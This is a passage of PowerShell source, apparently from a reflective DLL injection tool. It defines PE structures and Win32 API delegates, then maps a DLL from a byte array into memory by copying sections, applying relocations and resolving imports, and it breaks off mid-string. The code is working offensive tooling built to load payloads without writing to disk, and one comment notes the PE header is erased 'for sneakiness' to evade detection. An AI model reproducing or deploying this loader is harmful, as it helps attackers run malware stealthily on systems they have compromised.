$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8) - $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null - $IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION - - #Struct IMAGE_IMPORT_DESCRIPTOR - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20) - $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null - $IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR - - #Struct IMAGE_EXPORT_DIRECTORY - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40) - $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null - $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY - - return $Win32Types - } - - Function Get-Win32Constants - { - $Win32Constants = New-Object System.Object - - $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000 - - return $Win32Constants - } - - Function Get-Win32Functions - { - $Win32Functions = New-Object System.Object - - $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc - $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr]) - $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate) - $Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc - - $memcpyAddr = Get-ProcAddress msvcrt.dll memcpy - $memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr]) - $memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy - - $memsetAddr = Get-ProcAddress msvcrt.dll memset - $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr]) - $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset - - $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA - $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr]) - $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary - - $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress - $GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr]) - $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress - - $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree - $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool]) - $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate) - $Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree - - $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect - $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [Ref]) ([Bool]) - $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate) - $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect - - return $Win32Functions - } - ##################################### - - - ##################################### - ########### HELPERS ############ - ##################################### - - #Powershell only does signed arithmetic, so if we want to calculate memory addresses we have to use this function - #This will add signed integers as if they were unsigned integers so we can accurately calculate memory addresses - Function Sub-SignedIntAsUnsigned - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [Int64] - $Value1, - - [Parameter(Position = 1, Mandatory = $true)] - [Int64] - $Value2 - ) - - [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) - [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) - [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) - - if ($Value1Bytes.Count -eq $Value2Bytes.Count) - { - $CarryOver = 0 - for ($i = 0; $i -lt $Value1Bytes.Count; $i++) - { - $Val = $Value1Bytes[$i] - $CarryOver - #Sub bytes - if ($Val -lt $Value2Bytes[$i]) - { - $Val += 256 - $CarryOver = 1 - } - else - { - $CarryOver = 0 - } - - - [UInt16]$Sum = $Val - $Value2Bytes[$i] - - $FinalBytes[$i] = $Sum -band 0x00FF - } - } - else - { - Throw "Cannot subtract bytearrays of different sizes" - } - - return [BitConverter]::ToInt64($FinalBytes, 0) - } - - Function Add-SignedIntAsUnsigned - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [Int64] - $Value1, - - [Parameter(Position = 1, Mandatory = $true)] - [Int64] - $Value2 - ) - - [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) - [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) - [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) - - if ($Value1Bytes.Count -eq $Value2Bytes.Count) - { - $CarryOver = 0 - for ($i = 0; $i -lt $Value1Bytes.Count; $i++) - { - #Add bytes - [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver - - $FinalBytes[$i] = $Sum -band 0x00FF - - if (($Sum -band 0xFF00) -eq 0x100) - { - $CarryOver = 1 - } - else - { - $CarryOver = 0 - } - } - } - else - { - Throw "Cannot add bytearrays of different sizes" - } - - return [BitConverter]::ToInt64($FinalBytes, 0) - } - - Function Compare-Val1GreaterThanVal2AsUInt - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [Int64] - $Value1, - - [Parameter(Position = 1, Mandatory = $true)] - [Int64] - $Value2 - ) - - [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) - [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) - - if ($Value1Bytes.Count -eq $Value2Bytes.Count) - { - for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--) - { - if ($Value1Bytes[$i] -gt $Value2Bytes[$i]) - { - return $true - } - elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i]) - { - return $false - } - } - } - else - { - Throw "Cannot compare byte arrays of different size" - } - - return $false - } - - Function Convert-UIntToInt - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [UInt64] - $Value - ) - - [Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value) - return ([BitConverter]::ToInt64($ValueBytes, 0)) - } - - Function Test-MemoryRangeValid - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [String] - $DebugString, - - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $DllInfo, - - [Parameter(Position = 2, Mandatory = $true)] - [IntPtr] - $StartAddress, - - [Parameter(ParameterSetName = "EndAddress", Position = 3, Mandatory = $true)] - [IntPtr] - $EndAddress, - - [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)] - [IntPtr] - $Size - ) - - [IntPtr]$FinalEndAddress = [IntPtr]::Zero - if ($PsCmdlet.ParameterSetName -eq "Size") - { - [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size)) - } - else - { - $FinalEndAddress = $EndAddress - } - - $DllEndAddress = $DllInfo.EndAddress - - if ((Compare-Val1GreaterThanVal2AsUInt ($DllInfo.DllHandle) ($StartAddress)) -eq $true) - { - Throw "Trying to write to memory smaller than allocated address range. $DebugString" - } - if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($DllEndAddress)) -eq $true) - { - Throw "Trying to write to memory greater than allocated address range. $DebugString" - } - } - - #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ - Function Get-DelegateType - { - Param - ( - [OutputType([Type])] - - [Parameter( Position = 0)] - [Type[]] - $Parameters = (New-Object Type[](0)), - - [Parameter( Position = 1 )] - [Type] - $ReturnType = [Void] - ) - - $Domain = [AppDomain]::CurrentDomain - $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate') - $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) - $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) - $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) - $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) - $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') - $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) - $MethodBuilder.SetImplementationFlags('Runtime, Managed') - - Write-Output $TypeBuilder.CreateType() - } - - #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ - Function Get-ProcAddress - { - Param - ( - [OutputType([IntPtr])] - - [Parameter( Position = 0, Mandatory = $True )] - [String] - $Module, - - [Parameter( Position = 1, Mandatory = $True )] - [String] - $Procedure - ) - - # Get a reference to System.dll in the GAC - $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | - Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } - $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') - # Get a reference to the GetModuleHandle and GetProcAddress methods - $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') - $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress') - # Get a handle to the module specified - $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) - $tmpPtr = New-Object IntPtr - $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) - - # Return the address of the function - Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) - } - - #Function written by Lee Holmes, Blog: http://www.leeholmes.com/blog/ - function Invoke-Win32([string] $dllName, [Type] $returnType, - [string] $methodName, [Type[]] $parameterTypes, [Object[]] $parameters) - { - ## Begin to build the dynamic assembly - $domain = [AppDomain]::CurrentDomain - $name = New-Object Reflection.AssemblyName ‘PInvokeAssembly’ - $assembly = $domain.DefineDynamicAssembly($name, ‘Run’) - $module = $assembly.DefineDynamicModule(‘PInvokeModule’) - $type = $module.DefineType(‘PInvokeType’, “Public,BeforeFieldInit”) - - ## Go through all of the parameters passed to us. As we do this, - ## we clone the user’s inputs into another array that we will use for - ## the P/Invoke call. - $inputParameters = @() - $refParameters = @() - - for($counter = 1; $counter -le $parameterTypes.Length; $counter++) - { - ## If an item is a PSReference, then the user - ## wants an [out] parameter. - if($parameterTypes[$counter - 1] -eq [Ref]) - { - ## Remember which parameters are used for [Out] parameters - $refParameters += $counter - - ## On the cloned array, we replace the PSReference type with the - ## .Net reference type that represents the value of the PSReference, - ## and the value with the value held by the PSReference. - $parameterTypes[$counter - 1] = - $parameters[$counter - 1].Value.GetType().MakeByRefType() - $inputParameters += $parameters[$counter - 1].Value - } - else - { - ## Otherwise, just add their actual parameter to the - ## input array. - $inputParameters += $parameters[$counter - 1] - } - } - - ## Define the actual P/Invoke method, adding the [Out] - ## attribute for any parameters that were originally [Ref] - ## parameters. - $method = $type.DefineMethod($methodName, ‘Public,HideBySig,Static,PinvokeImpl’, - $returnType, $parameterTypes) - foreach($refParameter in $refParameters) - { - $method.DefineParameter($refParameter, “Out”, $null) - } - - ## Apply the P/Invoke constructor - $ctor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([string]) - $attr = New-Object Reflection.Emit.CustomAttributeBuilder $ctor, $dllName - $method.SetCustomAttribute($attr) - - ## Create the temporary type, and invoke the method. - $realType = $type.CreateType() - $realType.InvokeMember($methodName, ‘Public,Static,InvokeMethod’, $null, $null, - $inputParameters) - - ## Finally, go through all of the reference parameters, and update the - ## values of the PSReference objects that the user passed in. - foreach($refParameter in $refParameters) - { - $parameters[$refParameter - 1].Value = $inputParameters[$refParameter - 1] - } - } - - Function Get-ImageNtHeaders - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [IntPtr] - $DllHandle, - - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $Win32Types - ) - - $NtHeadersInfo = New-Object System.Object - - #Normally would validate DOSHeader here, but we did it before this function was called and then destroyed 'MZ' for sneakiness - $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($DllHandle, $Win32Types.IMAGE_DOS_HEADER) - - #Get IMAGE_NT_HEADERS - [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$DllHandle) ([Int64][UInt64]$dosHeader.e_lfanew)) - $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr - $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, $Win32Types.IMAGE_NT_HEADERS64) - - #Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen. - if ($imageNtHeaders64.Signature -ne 0x00004550) - { - throw "Invalid IMAGE_NT_HEADER signature." - } - - if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC') - { - $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64 - $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name Dll64Bit -Value $true - } - else - { - $imageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, $Win32Types.IMAGE_NT_HEADERS32) - $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32 - $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name Dll64Bit -Value $false - } - - return $NtHeadersInfo - } - - #This function will get the information needed to allocated space in memory for the DLL - Function Get-DllBasicInfo - { - Param( - [Parameter( Position = 0, Mandatory = $true )] - [Byte[]] - $DllBytes, - - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $Win32Types - ) - - $DllInfo = New-Object System.Object - - #Write the Dll to memory temporarily so I can get information from it. This is not it's final resting spot. - [IntPtr]$UnmanagedDllBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($dllBytes.Length) - [System.Runtime.InteropServices.Marshal]::Copy($dllBytes, 0, $UnmanagedDllBytes, $dllBytes.Length) | Out-Null - - #Get NtHeadersInfo - $NtHeadersInfo = Get-ImageNtHeaders -DllHandle $UnmanagedDllBytes -Win32Types $Win32Types - - #Build a structure with the information which will be needed for allocating memory and writing the DLL to memory - $DllInfo | Add-Member -MemberType NoteProperty -Name 'Dll64Bit' -Value ($NtHeadersInfo.Dll64Bit) - $DllInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase) - $DllInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage) - $DllInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders) - - #Free the memory allocated above, this isn't where we allocate the dll to memory - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedDllBytes) - - return $DllInfo - } - - - - - #DllInfo must contain the following NoteProperties: - # DllHandle: An IntPtr to the address the Dll is loaded to in memory - Function Get-DllDetailedInfo - { - Param( - [Parameter( Position = 0, Mandatory = $true)] - [IntPtr] - $DllHandle, - - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $Win32Types - ) - - if ($DllHandle -eq $null -or $DllHandle -eq [IntPtr]::Zero) - { - throw 'DllHandle is null or IntPtr.Zero' - } - - $DllInfo = New-Object System.Object - - #Get NtHeaders information - $NtHeadersInfo = Get-ImageNtHeaders -DllHandle $DllHandle -Win32Types $Win32Types - - #Build the DllInfo object - $DllInfo | Add-Member -MemberType NoteProperty -Name DllHandle -Value $DllHandle - $DllInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS) - $DllInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr) - $DllInfo | Add-Member -MemberType NoteProperty -Name Dll64Bit -Value ($NtHeadersInfo.Dll64Bit) - - if ($DllInfo.Dll64Bit -eq $true) - { - [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$DllInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf($Win32Types.IMAGE_NT_HEADERS64))) - $DllInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr - } - else - { - [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$DllInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf($Win32Types.IMAGE_NT_HEADERS32))) - $DllInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr - } - - return $DllInfo - } - - Function Copy-Sections - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [Byte[]] - $DllBytes, - - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $DllInfo, - - [Parameter(Position = 2, Mandatory = $true)] - [System.Object] - $Win32Functions, - - [Parameter(Position = 3, Mandatory = $true)] - [System.Object] - $Win32Types - ) - - for( $i = 0; $i -lt $DllInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++) - { - [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$DllInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf($Win32Types.IMAGE_SECTION_HEADER))) - $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, $Win32Types.IMAGE_SECTION_HEADER) - - #Address to copy the section to - [IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$DllInfo.DllHandle) ([Int64]$SectionHeader.VirtualAddress)) - - #SizeOfRawData is the size of the data on disk, VirtualSize is the minimum space that can be allocated - # in memory for the section. If VirtualSize > SizeOfRawData, pad the extra spaces with 0. If - # SizeOfRawData > VirtualSize, it is because the section stored on disk has padding that we can throw away, - # so truncate SizeOfRawData to VirtualSize - $SizeOfRawData = $SectionHeader.SizeOfRawData - - if ($SectionHeader.PointerToRawData -eq 0) - { - $SizeOfRawData = 0 - } - - if ($SizeOfRawData -gt $SectionHeader.VirtualSize) - { - $SizeOfRawData = $SectionHeader.VirtualSize - } - - if ($SizeOfRawData -gt 0) - { - Test-MemoryRangeValid -DebugString "Copy-Sections::MarshalCopy" -DllInfo $DllInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null - [System.Runtime.InteropServices.Marshal]::Copy($DllBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData) - } - - #If SizeOfRawData is less than VirtualSize, set memory to 0 for the extra space - if ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize) - { - $Difference = $SectionHeader.VirtualSize - $SizeOfRawData - [IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData)) - Test-MemoryRangeValid -DebugString "Copy-Sections::Memset" -DllInfo $DllInfo -StartAddress $StartAddress -Size $Difference | Out-Null - $Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null - } - } - } - - - Function Update-MemoryAddresses - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [System.Object] - $DllInfo, - - [Parameter(Position = 1, Mandatory = $true)] - [Int64] - $OriginalImageBase, - - [Parameter(Position = 2, Mandatory = $true)] - [System.Object] - $Win32Constants, - - [Parameter(Position = 3, Mandatory = $true)] - [System.Object] - $Win32Types - ) - - [Int64]$BaseDifference = 0 - $AddDifference = $true #Track if the difference variable should be added or subtracted from variables - [UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf($Win32Types.IMAGE_BASE_RELOCATION) - - #If the Dll was loaded to its expected address or there are no entries in the BaseRelocationTable, nothing to do - if (($OriginalImageBase -eq [Int64]$DllInfo.DllHandle) ` - -or ($DllInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0)) - { - return - } - - - elseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($DllInfo.DllHandle)) -eq $true) - { - $BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($DllInfo.DllHandle) - $AddDifference = $false - } - elseif ((Compare-Val1GreaterThanVal2AsUInt ($DllInfo.DllHandle) ($OriginalImageBase)) -eq $true) - { - $BaseDifference = Sub-SignedIntAsUnsigned ($DllInfo.DllHandle) ($OriginalImageBase) - } - - #Use the IMAGE_BASE_RELOCATION structure to find memory addresses which need to be modified - [IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$DllInfo.DllHandle) ([Int64]$DllInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress)) - while($true) - { - #If SizeOfBlock == 0, we are done - $BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, $Win32Types.IMAGE_BASE_RELOCATION) - - if ($BaseRelocationTable.SizeOfBlock -eq 0) - { - break - } - - [IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$DllInfo.DllHandle) ([Int64]$BaseRelocationTable.VirtualAddress)) - $NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2 - - #Loop through each relocation - for($i = 0; $i -lt $NumRelocations; $i++) - { - #Get info for this relocation - $RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i))) - [UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [UInt16]) - - #First 4 bits is the relocation type, last 12 bits is the address offset from $MemAddrBase - [UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF - [UInt16]$RelocType = $RelocationInfo -band 0xF000 - for ($j = 0; $j -lt 12; $j++) - { - $RelocType = [Math]::Floor($RelocType / 2) - } - - #For DLL's there are two types of relocations used according to the following MSDN article. One for 64bit and one for 32bit. - # Site: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx - if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) ` - -or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64)) - { - #Get the current memory address and update it based off the difference between Dll expected base address and actual base address - [IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset)) - [IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [IntPtr]) - - if ($AddDifference -eq $true) - { - [IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference)) - } - else - { - [IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference)) - } - - [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null - } - elseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE) - { - #IMAGE_REL_BASED_ABSOLUTE is just used for padding, we don't actually do anything with it - Throw "Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo" - } - } - - $BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock)) - } - } - - - Function Import-DllImports - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [System.Object] - $DllInfo, - - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $Win32Functions, - - [Parameter(Position = 2, Mandatory = $true)] - [System.Object] - $Win32Types - ) - - if ($DllInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0) - { - [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$DllInfo.DllHandle) ([Int64]$DllInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress) - - while ($true) - { - $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, $Win32Types.IMAGE_IMPORT_DESCRIPTOR) - - #If the structure is null, it signals that this is the end of the array - if ($ImportDescriptor.Characteristics -eq 0 ` - -and $ImportDescriptor.FirstThunk -eq 0 ` - -and $ImportDescriptor.ForwarderChain -eq 0 ` - -and $ImportDescriptor.Name -eq 0 ` - -and $ImportDescriptor.TimeDateStamp -eq 0) - { - Write-Verbose "Done importing DLL imports" - break - } - - $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$DllInfo.DllHandle) ([Int64]$ImportDescriptor.Name))) - $ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath) - - if ($ImportDllHandle -eq $null) - { - throw "Error importing 